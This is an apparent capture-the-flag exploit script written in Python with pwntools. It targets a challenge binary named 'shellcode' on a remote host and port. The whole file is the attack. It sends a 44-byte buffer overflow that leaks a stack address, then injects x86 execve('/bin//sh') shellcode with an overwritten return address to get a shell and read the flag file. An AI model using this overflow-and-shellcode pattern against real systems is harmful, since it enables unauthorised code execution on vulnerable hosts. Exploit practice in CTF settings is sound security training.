#!/usr/bin/env python
from pwn import *

#context.log_level = 'debug'
DEBUG=0
if DEBUG:
	p = process("./bin/shellcode")
else:
	ip = "202.120.7.114"
	port = 10104
	p = remote(ip, port)


def exp():
	p.recvuntil("Show me the shellcode:\n")
	p.sendline('a'*44+p32(0x080485f9))
	p.recvuntil("Your buf is at 0x")
	stack_addr = int(p.recvuntil(".")[:-1],16)
	print "stack_addr =>", hex(stack_addr)
	p.recvuntil("Show me the shellcode:\n")
	payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
	payload += "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
	payload += 'a'*(44-len(payload))
	payload += p32(stack_addr)
	p.sendline(payload)
	p.sendline('cat /home/shellcode/flag')
	p.recvuntil('\n')
	print p.recvuntil('\n')
	#p.interactive()
	p.close()


exp()
